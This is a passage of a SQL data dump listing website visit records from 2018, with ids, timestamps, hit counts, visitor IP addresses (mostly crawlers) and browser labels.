66.249.66.155',''),(236825,1524983976,1,1,0,0,'87.250.224.46','other'),(236826,1524984066,1,0,1,0,'66.249.66.157',''),(236827,1524984221,1,1,0,0,'54.36.149.30','other'),(236828,1524984274,1,1,0,0,'54.36.148.14','other'),(236829,1524984297,1,1,0,0,'54.36.149.49','other'),(236830,1524984521,1,1,0,0,'54.36.148.181','other'),(236831,1524984570,1,1,0,0,'54.36.148.243','other'),(236832,1524984587,1,1,0,0,'54.36.148.39','other'),(236833,1524984697,1,1,0,0,'54.36.148.155','other'),(236834,1524984754,1,1,0,0,'216.244.66.237','other'),(236835,1524984816,1,1,0,0,'217.69.133.222','other'),(236836,1524984947,1,1,0,0,'54.36.149.60','other'),(236837,1524985245,1,1,0,0,'46.161.9.39','firefox'),(236838,1524985266,1,1,0,0,'54.36.148.228','other'),(236839,1524985303,1,1,0,0,'54.36.148.250','other'),(236840,1524985489,1,1,0,0,'54.36.148.55','other'),(236841,1524985532,1,1,0,0,'54.36.148.172','other'),(236842,1524985690,1,1,0,0,'54.36.148.241','other'),(236843,1524985693,1,1,0,0,'8.29.198.27','other'),(236844,1524985752,1,0,1,0,'66.249.66.155',''),(236845,1524985810,1,1,0,0,'66.249.66.156','chrome'),(236846,1524985822,1,1,0,0,'54.36.148.79','other'),(236847,1524985827,1,1,0,0,'91.209.11.236','other'),(236848,1524985982,1,1,0,0,'178.154.171.88','other'),(236849,1524986020,1,1,0,0,'54.36.149.83','other'),(236850,1524986134,1,1,0,0,'54.36.149.90','other'),(236851,1524986178,1,1,0,0,'54.36.148.26','other'),(236852,1524986322,1,1,0,0,'54.36.148.23','other'),(236853,1524986430,1,1,0,0,'216.244.66.237','other'),(236854,1524986547,1,1,0,0,'54.36.148.255','other'),(236855,1524986603,1,1,0,0,'54.36.148.32','other'),(236856,1524986777,2,2,0,0,'95.213.141.126','opera'),(236857,1524987054,1,1,0,0,'54.36.148.112','other'),(236858,1524987114,1,1,0,0,'95.216.12.178','other'),(236859,1524987393,1,1,0,0,'54.36.148.82','other'),(236860,1524987429,1,1,0,0,'54.36.148.207','other'),(236861,1524987527,1,1,0,0,'54.36.148.209','other'),(236862,1524987750,1,1,0,0,'54.36.149.5','other'),(236863,1524987762,1,0,1,0,'66.249.66.156',''),(236864,1524987918,1,1,0,0,'54.36.149.60','other'),(236865,1524987979,1,1,0,0,'54.36.148.187','other'),(236866,1524988084,2,0,2,0,'66.249.66.157',''),(236867,1524988197,1,0,1,0,'66.249.69.39',''),(236868,1524988219,1,1,0,0,'54.36.148.253','other'),(236869,1524988311,1,1,0,0,'54.36.148.121','other'),(236870,1524988427,1,1,0,0,'54.36.149.82','other'),(236871,1524988460,1,0,1,0,'66.249.66.74',''),(236872,1524988492,1,1,0,0,'54.36.148.248','other'),(236873,1524988612,1,1,0,0,'54.36.149.100','other'),(236874,1524988682,1,1,0,0,'66.249.66.155','chrome'),(236875,1524989391,2,0,2,0,'66.249.66.156',''),(236876,1524989574,1,1,0,0,'54.36.148.45','other'),(236877,1524989754,1,1,0,0,'54.36.148.228','other'),(236878,1524989767,3,0,3,0,'66.249.66.157',''),(236879,1524989919,1,1,0,0,'54.36.148.125','other'),(236880,1524989961,1,1,0,0,'54.36.148.123','other'),(236881,1524990056,1,1,0,0,'54.36.148.198','other'),(236882,1524990064,1,1,0,0,'54.36.148.124','other'),(236883,1524990074,1,1,0,0,'54.36.149.17','other'),(236884,1524990202,1,1,0,0,'54.36.148.86','other'),(236885,1524990226,1,1,0,0,'8.29.198.25','other'),(236886,1524990481,1,1,0,0,'216.244.66.237','other'),(236887,1524990550,1,1,0,0,'54.36.148.235','other'),(236888,1524990572,1,1,0,0,'54.36.148.172','other'),(236889,1524990641,1,1,0,0,'54.36.149.106','other'),(236890,1524990696,1,1,0,0,'40.77.167.186','other'),(236891,1524990890,1,1,0,0,'54.36.148.113','other'),(236892,1524991037,1,1,0,0,'54.36.149.14','other'),(236893,1524991050,1,1,0,0,'54.36.148.140','other'),(236894,1524991142,1,1,0,0,'54.36.148.10','other'),(236895,1524991262,1,1,0,0,'54.36.148.62','other'),(236896,1524991570,1,1,0,0,'178.154.171.88','other'),(236897,1524991641,1,1,0,0,'54.36.148.238','other'),(236898,1524991827,1,1,0,0,'54.36.148.15','other'),(236899,1524991840,1,1,0,0,'54.36.148.74','other'),(236900,1524991918,1,1,0,0,'54.36.149.101','other'),(236901,1524992074,1,1,0,0,'141.8.142.74','other'),(236902,1524992097,1,1,0,0,'54.36.148.182','other'),(236903,1524992184,1,1,0,0,'54.36.149.7','other'),(236904,1524992202,1,1,0,0,'54.36.148.183','other'),(236905,1524992259,1,1,0,0,'54.36.148.158','other'),(236906,1524992369,1,1,0,0,'54.36.148.116','other'),(236907,1524992373,1,1,0,0,'54.36.149.36','other'),(236908,1524992637,1,1,0,0,'54.36.148.210','other'),(236909,1524992806,1,0,1,0,'66.249.66.75',''),(236910,1524993034,1,1,0,0,'54.36.148.57','other'),(236911,1524993068,1,1,0,0,'216.244.66.237','other'),(236912,1524993126,1,1,0,0,'54.36.148.24','other'),(236913,1524993151,1,0,1,0,'66.249.66.157',''),(236914,1524993397,1,1,0,0,'54.36.148.88','other'),(236915,1524993521,1,1,0,0,'54.36.148.47','other'),(236916,1524993522,1,1,0,0,'54.36.149.92','other'),(236917,1524993680,1,1,0,0,'54.36.148.38','other'),(236918,1524993704,1,1,0,0,'54.36.149.38','other'),(236919,1524993940,1,1,0,0,'54.36.148.127','other'),(236920,1524994042,1,1,0,0,'216.244.66.237','other'),(236921,1524994377,1,1,0,0,'54.36.148.240','other'),(236922,1524994382,1,0,1,0,'66.249.66.156',''),(236923,1524994388,1,1,0,0,'54.36.148.20','other'),(236924,1524994395,1,1,0,0,'54.36.148.50','other'),(236925,1524994491,1,1,0,0,'54.36.148.49','other'),(236926,1524994579,1,1,0,0,'54.36.148.227','other'),(236927,1524994848,1,1,0,0,'54.36.149.99','other'),(236928,1524994853,1,1,0,0,'54.36.149.27','other'),(236929,1524995101,1,1,0,0,'54.36.149.82','other'),(236930,1524995169,2,2,0,0,'54.36.148.132','other'),(236931,1524995353,1,1,0,0,'54.36.149.67','other'),(236932,1524995402,1,1,0,0,'54.36.148.111','other'),(236933,1524995447,1,1,0,0,'37.9.113.110','other'),(236934,1524995966,1,0,1,0,'66.249.66.156',''),(236935,1524996032,1,1,0,0,'66.249.66.156','chrome'),(236936,1524996047,1,1,0,0,'54.36.148.213','other'),(236937,1524996475,1,0,1,0,'66.249.66.157',''),(236938,1524996523,1,1,0,0,'8.29.198.25','other'),(236939,1524996609,2,2,0,0,'162.210.196.98','other'),(236940,1524996998,1,1,0,0,'54.36.148.110','other'),(236941,1524997018,1,1,0,0,'54.36.148.179','other'),(236942,1524997026,1,1,0,0,'54.36.149.78','other'),(236943,1524997143,2,2,0,0,'54.36.148.62','other'),(236944,1524997160,1,1,0,0,'216.244.66.237','other'),(236945,1524997256,1,1,0,0,'54.36.148.98','other'),(236946,1524997340,1,1,0,0,'54.36.148.109','other'),(236947,1524997455,1,1,0,0,'54.36.149.74','other'),(236948,1524997571,1,1,0,0,'54.36.148.238','other'),(236949,1524997826,1,1,0,0,'66.249.66.75','chrome'),(236950,1524997889,1,0,1,0,'66.249.66.74',''),(236951,1524997991,1,1,0,0,'54.36.148.160','other'),(236952,1524998091,1,1,0,0,'54.36.148.150','other'),(236953,1524998492,1,1,0,0,'54.36.148.144','other'),(236954,1524998622,1,1,0,0,'54.36.149.28','other'),(236955,1524998714,1,0,1,0,'66.249.66.156',''),(236956,1524998817,1,1,0,0,'54.36.148.233','other'),(236957,1524999187,1,0,1,0,'66.249.66.155',''),(236958,1524999242,1,1,0,0,'54.36.148.204','other'),(236959,1524999512,1,1,0,0,'54.36.148.40','other'),(236960,1524999880,1,1,0,0,'54.36.149.97','other'),(236961,1524999907,2,2,0,0,'95.216.0.31','other'),(236962,1525000017,1,1,0,0,'54.36.149.93','other'),(236963,1525000191,1,1,0,0,'54.36.149.81','other'),(236964,1525000588,1,1,0,0,'54.36.148.149','other'),(236965,1525000663,1,1,0,0,'54.36.149.101','other'),(236966,1525001005,1,1,0,0,'54.36.149.93','other'),(236967,1525001069,1,1,0,0,'8.29.198.25','other'),(236968,1525001171,1,1,0,0,'54.36.148.155','other'),(236969,1525001221,1,1,0,0,'54.36.149.30','other'),(236970,1525001498,1,0,1,0,'66.249.66.157',''),(236971,1525001607,1,1,0,0,'54.36.148.80','other'),(236972,1525001617,1,1,0,0,'54.36.149.34','other'),(236973,1525001933,1,1,0,0,'54.36.148.231','other'),(236974,1525002025,1,1,0,0,'54.36.148.69','other'),(236975,1525002116,1,1,0,0,'54.36.148.233','other'),(236976,1525002239,1,1,0,0,'87.250.224.96','other'),(236977,1525002345,1,1,0,0,'54.36.149.74','other'),(236978,1525002714,1,1,0,0,'54.36.148.214','other'),(236979,1525002825,1,1,0,0,'54.36.149.68','other'),(236980,1525002994,1,1,0,0,'54.36.148.239','other'),(236981,1525003050,1,1,0,0,'54.36.148.119','other'),(236982,1525003201,1,1,0,0,'54.36.148.234','other'),(236983,1525003359,3,0,3,0,'66.249.66.156',''),(236984,1525003416,1,1,0,0,'54.36.148.182','other'),(236985,1525003430,1,1,0,0,'54.36.148.146','other'),(236986,1525003449,1,1,0,0,'54.36.148.134','other'),(236987,1525003638,1,1,0,0,'54.36.148.14','other'),(236988,1525003875,1,1,0,0,'54.36.148.53','other'),(236989,1525003908,1,1,0,0,'54.36.148.176','other'),(236990,1525004078,1,1,0,0,'54.36.148.220','other'),(236991,1525004118,1,1,0,0,'54.36.149.37','other'),(236992,1525004268,1,1,0,0,'54.36.148.52','other'),(236993,1525004455,1,1,0,0,'54.36.148.142','other'),(236994,1525004581,1,1,0,0,'207.46.13.127','other'),(236995,1525004622,1,1,0,0,'54.36.148.99','other'),(236996,1525004678,1,0,1,0,'66.249.66.155',''),(236997,1525004991,1,0,1,0,'66.249.66.156',''),(236998,1525005250,1,1,0,0,'54.36.148.28','other'),(236999,1525005530,1,1,0,0,'54.36.149.18','other'),(237000,1525005697,1,1,0,0,'54.36.148.89','other'),(237001,1525005842,2,0,2,0,'66.249.66.155',''),(237002,1525005944,1,1,0,0,'54.36.149.63','other'),(237003,1525006393,1,1,0,0,'54.36.148.241','other'),(237004,1525006475,1,1,0,0,'216.244.66.237','other'),(237005,1525006506,1,0,1,0,'66.249.66.156',''),(237006,1525006516,1,1,0,0,'66.249.66.156','chrome'),(237007,1525006616,1,1,0,0,'54.36.148.111','other'),(237008,1525006685,1,1,0,0,'66.249.66.76','chrome'),(237009,1525006702,1,0,1,0,'66.249.66.75',''),(237010,1525006955,1,1,0,0,'54.36.148.78','other'),(237011,1525007363,1,1,0,0,'8.29.198.25','other'),(237012,1525008049,2,2,0,0,'216.244.66.237','other'),(237013,1525009438,1,1,0,0,'216.244.66.237','other'),(237014,1525009815,1,1,0,0,'35.226.23.240','other'),(237015,1525009948,1,0,1,0,'66.249.66.74',''),(237016,1525009969,1,0,1,0,'66.249.66.75',''),(237017,1525010231,1,1,0,0,'54.36.149.26','other'),(237018,1525010432,1,1,0,0,'54.36.148.95','other'),(237019,1525010442,1,1,0,0,'54.36.148.217','other'),(237020,1525010827,1,1,0,0,'54.36.148.161','other'),(237021,1525010970,1,1,0,0,'216.244.66.237','other'),(237022,1525011721,1,0,1,0,'66.249.66.155',''),(237023,1525011907,1,1,0,0,'8.29.198.27','other'),(237024,1525014046,2,2,0,0,'216.244.66.237','other'),(237025,1525015167,1,1,0,0,'37.9.113.56','other'),(237026,1525015225,1,1,0,0,'216.244.66.237','other'),(237027,1525015289,1,0,1,0,'66.249.66.157',''),(237028,1525016193,1,1,0,0,'107.178.194.60','msie'),(237029,1525016334,1,1,0,0,'34.230.61.210','msie'),(237030,1525016384,1,1,0,0,'52.27.2.86','msie'),(237031,1525016391,1,1,0,0,'50.112.194.65','msie'),(237032,1525016518,1,1,0,0,'45.55.224.77','msie'),(237033,1525016742,1,1,0,0,'216.244.66.237','other'),(237034,1525016807,2,0,2,0,'66.249.66.157',''),(237035,1525016946,1,1,0,0,'66.249.66.157','chrome'),(237036,1525016949,2,1,1,0,'66.249.66.74',''),(237037,1525017451,1,0,1,0,'66.249.66.155',''),(237038,1525017566,1,0,1,0,'66.249.66.156',''),(237039,1525018190,1,1,0,0,'8.29.198.26','other'),(237040,1525019186,1,1,0,0,'40.77.167.171','other'),(237041,1525019729,1,1,0,0,'216.244.66.237','other'),(237042,1525020938,1,0,1,0,'66.249.66.157',''),(237043,1525021000,1,0,1,0,'66.249.66.155',''),(237044,1525022116,1,1,0,0,'66.249.66.155','chrome'),(237045,1525022124,1,1,0,0,'66.249.66.74','chrome'),(237046,1525022550,1,1,0,0,'157.55.39.208','other'),(237047,1525022663,2,2,0,0,'92.113.126.46','chrome'),(237048,1525022736,1,1,0,0,'8.29.198.25','other'),(237049,1525023603,1,1,0,0,'40.77.167.171','other'),(237050,1525024374,1,1,0,0,'157.55.39.208','other'),(237051,1525025972,1,1,0,0,'54.165.59.7','other'),(237052,1525026659,1,0,1,0,'66.249.66.156',''),(237053,1525027029,2,2,0,0,'216.244.66.237','other'),(237054,1525027105,1,0,1,0,'66.249.66.74',''),(237055,1525027542,1,1,0,0,'66.249.66.156','chrome'),(237056,1525027543,1,1,0,0,'66.249.66.76','chrome'),(237057,1525028036,2,2,0,0,'216.244.66.237','other'),(237058,1525028160,1,1,0,0,'35.226.23.240','other'),(237059,1525028429,1,1,0,0,'54.36.148.42','other'),(237060,1525028479,1,0,1,0,'66.249.66.155',''),(237061,1525028569,1,1,0,0,'54.36.149.19','other'),(237062,1525028653,1,1,0,0,'54.36.148.142','other'),(237063,1525029024,1,1,0,0,'8.29.198.26','other'),(237064,1525029258,1,1,0,0,'54.36.149.21','other'),(237065,1525029288,1,1,0,0,'54.36.148.111','other'),(237066,1525029455,1,1,0,0,'54.36.148.167','other'),(237067,1525029627,1,0,1,0,'66.249.66.155',''),(237068,1525029726,1,1,0,0,'54.36.149.82','other'),(237069,1525029769,1,1,0,0,'54.36.149.66','other'),(237070,1525029940,1,1,0,0,'54.36.148.238','other'),(237071,1525029953,1,1,0,0,'54.36.148.127','other'),(237072,1525030223,1,1,0,0,'54.36.148.42','other'),(237073,1525030306,1,1,0,0,'54.36.149.25','other'),(237074,1525030362,1,1,0,0,'54.36.148.230','other'),(237075,1525030481,1,1,0,0,'157.55.39.208','other'),(237076,1525030685,1,1,0,0,'54.36.148.19','other'),(237077,1525030713,1,1,0,0,'54.36.148.92','other'),(237078,1525030825,1,1,0,0,'54.36.148.77','other'),(237079,1525030834,2,2,0,0,'216.244.66.237','other'),(237080,1525031082,1,1,0,0,'54.36.148.91','other'),(237081,1525031092,1,1,0,0,'54.36.148.129','other'),(237082,1525031319,1,1,0,0,'54.36.149.23','other'),(237083,1525031616,1,1,0,0,'54.36.148.122','other'),(237084,1525031669,1,1,0,0,'54.36.148.154','other'),(237085,1525031806,1,1,0,0,'91.196.178.86','chrome'),(237086,1525031861,1,1,0,0,'54.36.148.160','other'),(237087,1525031881,1,1,0,0,'54.36.148.133','other'),(237088,1525031914,1,1,0,0,'54.36.149.91','other'),(237089,1525032149,1,1,0,0,'54.36.148.204','other'),(237090,1525032157,1,1,0,0,'54.36.148.145','other'),(237091,1525032601,1,1,0,0,'54.36.148.215','other'),(237092,1525032645,1,1,0,0,'54.36.148.217','other'),(237093,1525032663,1,1,0,0,'54.36.148.155','other'),(237094,1525032793,1,1,0,0,'54.36.148.12','other'),(237095,1525032855,1,1,0,0,'207.46.13.127','other'),(237096,1525033011,1,1,0,0,'66.249.66.156','chrome'),(237097,1525033020,1,1,0,0,'54.36.148.248','other'),(237098,1525033172,1,1,0,0,'54.36.148.246','other'),(237099,1525033216,1,1,0,0,'54.36.148.14','other'),(237100,1525033311,1,1,0,0,'54.36.149.59','other'),(237101,1525033466,1,1,0,0,'54.36.148.92','other'),(237102,1525033484,1,1,0,0,'54.36.148.87','other'),(237103,1525033584,1,1,0,0,'8.29.198.25','other'),(237104,1525033687,1,1,0,0,'216.244.66.237','other'),(237105,1525033893,1,1,0,0,'54.36.149.45','other'),(237106,1525034125,1,1,0,0,'54.36.148.99','other'),(237107,1525034253,1,1,0,0,'54.36.148.132','other'),(237108,1525034426,1,1,0,0,'212.47.234.85','firefox'),(237109,1525034459,1,1,0,0,'196.52.10.12','firefox'),(237110,1525034812,1,1,0,0,'54.36.148.207','other'),(237111,1525034820,1,1,0,0,'54.36.148.101','other'),(237112,1525034951,1,1,0,0,'54.36.149.79','other'),(237113,1525035000,1,1,0,0,'54.36.148.157','other'),(237114,1525035022,1,1,0,0,'54.36.149.49','other'),(237115,1525035062,1,1,0,0,'216.244.66.237','other'),(237116,1525035307,1,1,0,0,'54.36.149.26','other'),(237117,1525035335,1,1,0,0,'54.36.149.87','other'),(237118,1525035360,1,1,0,0,'54.36.148.84','other'),(237119,1525035706,1,1,0,0,'207.46.13.127','other'),(237120,1525036394,1,1,0,0,'216.244.66.237','other'),(237121,1525036483,1,1,0,0,'54.36.148.24','other'),(237122,1525036593,1,1,0,0,'66.249.66.157','chrome'),(237123,1525036600,1,1,0,0,'66.249.66.76','chrome'),(237124,1525036687,1,1,0,0,'54.36.148.20','other'),(237125,1525036851,1,1,0,0,'54.36.148.231','other'),(237126,1525036985,1,1,0,0,'54.36.148.148','other'),(237127,1525037075,1,1,0,0,'180.76.15.140','other'),(237128,1525037081,1,1,0,0,'54.36.149.86','other'),(237129,1525037279,1,1,0,0,'54.36.148.206','other'),(237130,1525037511,1,1,0,0,'54.36.148.51','other'),(237131,1525037622,1,1,0,0,'54.36.148.57','other'),(237132,1525037735,1,1,0,0,'40.77.167.185','other'),(237133,1525037824,1,0,1,0,'66.249.66.156',''),(237134,1525038100,3,0,3,0,'66.249.66.155',''),(237135,1525038364,1,1,0,0,'54.36.149.8','other'),(237136,1525038435,1,1,0,0,'54.36.148.210','other'),(237137,1525038533,1,1,0,0,'54.36.149.44','other'),(237138,1525038594,1,1,0,0,'54.36.149.77','other'),(237139,1525038631,1,1,0,0,'54.36.148.22','other'),(237140,1525038794,1,1,0,0,'54.36.148.170','other'),(237141,1525039214,1,1,0,0,'54.36.148.111','other'),(237142,1525039335,1,1,0,0,'54.36.149.19','other'),(237143,1525039692,1,1,0,0,'54.36.148.63','other'),(237144,1525039845,1,1,0,0,'8.29.198.27','other'),(237145,1525039873,1,1,0,0,'54.36.148.230','other'),(237146,1525040010,1,1,0,0,'54.36.149.8','other'),(237147,1525040118,1,1,0,0,'54.36.148.215','other'),(237148,1525040372,1,1,0,0,'54.36.148.172','other'),(237149,1525040423,1,1,0,0,'54.36.149.62','other'),(237150,1525040688,1,1,0,0,'54.36.148.90','other'),(237151,1525040692,1,0,1,0,'66.249.66.76',''),(237152,1525040960,2,2,0,0,'216.244.66.237','other'),(237153,1525041316,1,1,0,0,'54.36.148.146','other'),(237154,1525041380,1,1,0,0,'54.36.148.125','other'),(237155,1525041631,1,1,0,0,'54.36.149.52','other'),(237156,1525041668,1,1,0,0,'54.36.148.60','other'),(237157,1525041690,1,1,0,0,'95.134.168.17','chrome'),(237158,1525041692,1,1,0,0,'54.36.148.156','other'),(237159,1525041825,1,1,0,0,'54.36.149.39','other'),(237160,1525041927,1,1,0,0,'54.36.148.215','other'),(237161,1525042093,1,1,0,0,'54.36.148.107','other'),(237162,1525042132,1,1,0,0,'54.36.148.25','other'),(237163,1525042336,1,1,0,0,'54.36.149.43','other'),(237164,1525042513,1,1,0,0,'54.36.148.178','other'),(237165,1525042780,1,0,1,0,'66.249.66.155',''),(237166,1525042928,1,1,0,0,'54.36.148.251','other'),(237167,1525043349,1,1,0,0,'54.36.149.68','other'),(237168,1525043557,6,6,0,0,'94.142.140.211','firefox'),(237169,1525043699,1,1,0,0,'66.249.66.156','chrome'),(237170,1525043704,1,1,0,0,'66.249.66.74','chrome'),(237171,1525043977,1,1,0,0,'54.36.149.84','other'),(237172,1525044059,1,1,0,0,'54.36.148.235','other'),(237173,1525044158,1,1,0,0,'54.36.148.233','other'),(237174,1525044174,1,1,0,0,'54.36.148.206','other'),(237175,1525044413,1,1,0,0,'8.29.198.26','other'),(237176,1525044692,1,1,0,0,'54.36.148.190','other'),(237177,1525044908,1,1,0,0,'54.36.148.202','other'),(237178,1525045014,1,0,1,0,'66.249.66.157',''),(237179,1525045151,1,1,0,0,'54.36.149.40','other'),(237180,1525045256,1,1,0,0,'54.36.149.29','other'),(237181,1525045354,1,1,0,0,'54.36.148.67','other'),(237182,1525045554,1,1,0,0,'54.36.149.31','other'),(237183,1525045558,1,1,0,0,'54.36.148.194','other'),(237184,1525045703,1,1,0,0,'217.69.133.217','other'),(237185,1525045731,1,1,0,0,'54.36.148.83','other'),(237186,1525045966,1,1,0,0,'54.36.149.39','other'),(237187,1525046006,1,1,0,0,'207.46.13.127','other'),(237188,1525046163,1,1,0,0,'54.36.148.108','other'),(237189,1525046422,1,1,0,0,'40.77.167.35','other'),(237190,1525046733,1,1,0,0,'54.36.149.50','other'),(237191,1525046895,1,1,0,0,'54.36.148.124','other'),(237192,1525047034,1,1,0,0,'54.36.148.211','other'),(237193,1525047277,2,2,0,0,'54.36.148.111','other'),(237194,1525047366,1,1,0,0,'54.36.149.40','other'),(237195,1525047575,1,1,0,0,'54.36.148.151','other'),(237196,1525047630,1,1,0,0,'54.36.149.52','other'),(237197,1525047769,1,1,0,0,'54.36.149.96','other'),(237198,1525047798,1,1,0,0,'54.36.148.187','other'),(237199,1525047855,1,1,0,0,'54.36.149.84','other'),(237200,1525047951,1,1,0,0,'54.36.148.76','other'),(237201,1525047952,1,1,0,0,'54.36.149.43','other'),(237202,1525048366,1,1,0,0,'54.36.148.239','other'),(237203,1525048869,1,1,0,0,'54.36.149.68','other'),(237204,1525049075,1,1,0,0,'54.36.148.245','other'),(237205,1525049184,1,1,0,0,'54.36.148.100','other'),(237206,1525049189,1,1,0,0,'54.36.148.62','other'),(237207,1525049222,1,1,0,0,'54.36.148.28','other'),(237208,1525049579,1,1,0,0,'54.36.149.8','other'),(237209,1525050428,1,1,0,0,'54.36.149.29','other'),(237210,1525050493,1,1,0,0,'54.36.149.78','other'),(237211,1525050548,1,1,0,0,'54.36.148.144','other'),(237212,1525050676,1,1,0,0,'8.29.198.25','other'),(237213,1525050700,1,1,0,0,'54.36.148.226','other'),(237214,1525050912,1,1,0,0,'216.244.66.237','other'),(237215,1525051068,1,1,0,0,'54.36.148.117','other'),(237216,1525051109,1,1,0,0,'54.36.148.169','other'),(237217,1525051154,1,1,0,0,'54.36.148.99','other'),(237218,1525051571,1,1,0,0,'54.36.149.70','other'),(237219,1525051608,1,1,0,0,'54.36.148.116','other'),(237220,1525051896,1,1,0,0,'54.36.148.183','other'),(237221,1525051972,1,1,0,0,'54.36.148.244','other'),(237222,1525052238,1,1,0,0,'54.36.149.92','other'),(237223,1525052258,1,1,0,0,'54.36.148.223','other'),(237224,1525052296,1,1,0,0,'54.36.148.202','other'),(237225,1525052498,1,1,0,0,'54.36.149.26','other'),(237226,1525052507,2,2,0,0,'54.36.149.45','other'),(237227,1525052510,1,1,0,0,'54.36.148.156','other'),(237228,1525052724,1,1,0,0,'54.36.149.73','other'),(237229,1525052732,1,1,0,0,'54.36.149.102','other'),(237230,1525052803,1,1,0,0,'54.36.148.103','other'),(237231,1525053409,1,1,0,0,'54.36.149.70','other'),(237232,1525053657,1,1,0,0,'216.244.66.237','other'),(237233,1525053754,1,1,0,0,'54.36.149.9','other'),(237234,1525053917,1,1,0,0,'54.36.148.171','other'),(237235,1525054335,1,0,1,0,'66.249.66.155',''),(237236,1525054612,1,1,0,0,'54.36.148.42','other'),(237237,1525054738,1,1,0,0,'54.36.149.23','other'),(237238,1525054841,1,1,0,0,'54.36.148.136','other'),(237239,1525055177,2,2,0,0,'216.244.66.237','other'),(237240,1525055197,1,0,1,0,'66.249.66.156',''),(237241,1525055248,1,1,0,0,'8.29.198.27','other'),(237242,1525055389,1,1,0,0,'54.36.148.181','other'),(237243,1525055605,1,1,0,0,'54.36.149.2','other'),(237244,1525055661,1,1,0,0,'54.36.148.155','other'),(237245,1525055737,1,1,0,0,'54.36.148.178','other'),(237246,1525055743,1,1,0,0,'54.36.148.153','other'),(237247,1525055955,1,1,0,0,'54.36.149.97','other'),(237248,1525056267,1,1,0,0,'54.36.148.158','other'),(237249,1525056424,1,1,0,0,'54.36.148.243','other'),(237250,1525056519,1,1,0,0,'51.255.66.115','other'),(237251,1525056709,1,1,0,0,'54.36.149.63','other'),(237252,1525057112,1,1,0,0,'54.36.148.164','other'),(237253,1525057325,1,1,0,0,'54.36.148.58','other'),(237254,1525057348,1,1,0,0,'54.36.149.49','other'),(237255,1525057472,1,1,0,0,'54.36.149.80','other'),(237256,1525057518,1,0,1,0,'66.249.66.75',''),(237257,1525057530,1,0,1,0,'66.249.66.157',''),(237258,1525057761,1,1,0,0,'66.249.66.157','chrome'),(237259,1525057763,1,1,0,0,'66.249.66.76','chrome'),(237260,1525057996,1,1,0,0,'157.55.39.208','other'),(237261,1525058145,1,1,0,0,'216.244.66.237','other'),(237262,1525058208,1,1,0,0,'54.36.148.72','other'),(237263,1525059051,1,1,0,0,'54.36.148.114','other'),(237264,1525059126,1,1,0,0,'54.36.148.216','other'),(237265,1525059138,1,1,0,0,'91.196.178.130','firefox'),(237266,1525059365,1,1,0,0,'54.36.148.231','other'),(237267,1525059630,1,1,0,0,'54.36.148.201','other'),(237268,1525059879,1,1,0,0,'54.36.149.53','other'),(237269,1525060009,1,1,0,0,'54.36.149.95','other'),(237270,1525060146,1,1,0,0,'54.36.148.108','other'),(237271,1525060171,1,1,0,0,'54.36.148.60','other'),(237272,1525060229,1,1,0,0,'54.36.148.252','other'),(237273,1525060242,1,1,0,0,'46.161.9.39','firefox'),(237274,1525060341,1,1,0,0,'54.36.148.23','other'),(237275,1525060865,1,1,0,0,'54.36.148.242','other'),(237276,1525061165,1,1,0,0,'54.36.148.75','other'),(237277,1525061480,9,9,0,0,'95.216.20.39','other'),(237278,1525061510,1,1,0,0,'8.29.198.26','other'),(237279,1525061586,1,1,0,0,'54.36.148.121','other'),(237280,1525061634,1,1,0,0,'54.36.149.10','other'),(237281,1525061680,1,1,0,0,'54.36.148.128','other'),(237282,1525061713,1,1,0,0,'54.36.149.73','other'),(237283,1525061948,1,1,0,0,'54.36.148.18','other'),(237284,1525062145,1,1,0,0,'54.36.148.199','other'),(237285,1525062398,1,1,0,0,'54.36.148.59','other'),(237286,1525062436,1,1,0,0,'54.36.148.115','other'),(237287,1525062658,1,1,0,0,'54.36.149.107','other'),(237288,1525062980,1,1,0,0,'54.36.148.136','other'),(237289,1525063052,1,1,0,0,'54.36.149.63','other'),(237290,1525063256,1,1,0,0,'54.36.148.203','other'),(237291,1525063362,1,1,0,0,'54.36.148.50','other'),(237292,1525063603,1,1,0,0,'54.36.149.49','other'),(237293,1525063684,1,1,0,0,'54.36.148.172','other'),(237294,1525063983,1,1,0,0,'54.36.148.121','other'),(237295,1525064392,1,1,0,0,'54.36.148.47','other'),(237296,1525064445,1,1,0,0,'54.36.148.228','other'),(237297,1525064485,1,1,0,0,'54.36.148.134','other'),(237298,1525064510,1,1,0,0,'54.36.149.32','other'),(237299,1525064512,1,1,0,0,'54.36.148.175','other'),(237300,1525064786,1,1,0,0,'54.36.149.70','other'),(237301,1525064944,1,1,0,0,'66.249.66.155','chrome'),(237302,1525065000,1,1,0,0,'66.249.66.76','chrome'),(237303,1525065116,1,1,0,0,'54.36.149.11','other'),(237304,1525065246,1,1,0,0,'54.36.148.210','other'),(237305,1525065259,1,1,0,0,'216.244.66.237','other'),(237306,1525065437,1,1,0,0,'54.36.148.206','other'),(237307,1525065500,1,1,0,0,'54.36.148.246','other'),(237308,1525065640,1,1,0,0,'54.36.148.161','other'),(237309,1525065703,1,1,0,0,'54.36.148.152','other'),(237310,1525066033,1,0,1,0,'66.249.66.155',''),(237311,1525066085,1,1,0,0,'8.29.198.25','other'),(237312,1525066675,1,1,0,0,'54.36.149.10','other'),(237313,1525066757,2,2,0,0,'216.244.66.237','other'),(237314,1525066817,1,1,0,0,'54.36.149.45','other'),(237315,1525066883,1,1,0,0,'54.36.148.179','other'),(237316,1525066926,1,1,0,0,'54.36.149.0','other'),(237317,1525066989,1,1,0,0,'54.36.148.102','other'),(237318,1525067054,1,1,0,0,'54.36.149.63','other'),(237319,1525067746,1,1,0,0,'54.36.148.128','other'),(237320,1525067870,1,1,0,0,'54.36.149.95','other'),(237321,1525067994,1,1,0,0,'54.36.149.19','other'),(237322,1525068076,1,1,0,0,'54.36.149.57','other'),(237323,1525068116,1,1,0,0,'54.36.149.79','other'),(237324,1525068219,1,1,0,0,'54.36.148.244','other'),(237325,1525068453,1,1,0,0,'54.36.149.11','other'),(237326,1525068663,2,2,0,0,'91.196.178.161','chrome'),(237327,1525068699,2,1,1,0,'66.249.66.156',''),(237328,1525068719,1,1,0,0,'54.36.148.11','other'),(237329,1525068802,1,1,0,0,'66.249.66.155','chrome'),(237330,1525069043,1,1,0,0,'54.36.148.248','other'),(237331,1525069386,1,0,1,0,'66.249.66.76',''),(237332,1525070079,1,1,0,0,'54.36.148.210','other'),(237334,1525070125,1,1,0,0,'54.36.149.15','other'),(237335,1525070371,1,1,0,0,'54.36.148.180','other'),(237336,1525070441,1,1,0,0,'54.36.149.46','other'),(237337,1525070664,1,1,0,0,'54.36.149.5','other'),(237338,1525071038,1,1,0,0,'157.55.39.39','other'),(237339,1525071044,1,1,0,0,'216.244.66.237','other'),(237340,1525071281,1,1,0,0,'54.36.148.226','other'),(237341,1525071375,1,1,0,0,'54.36.148.92','other'),(237342,152507143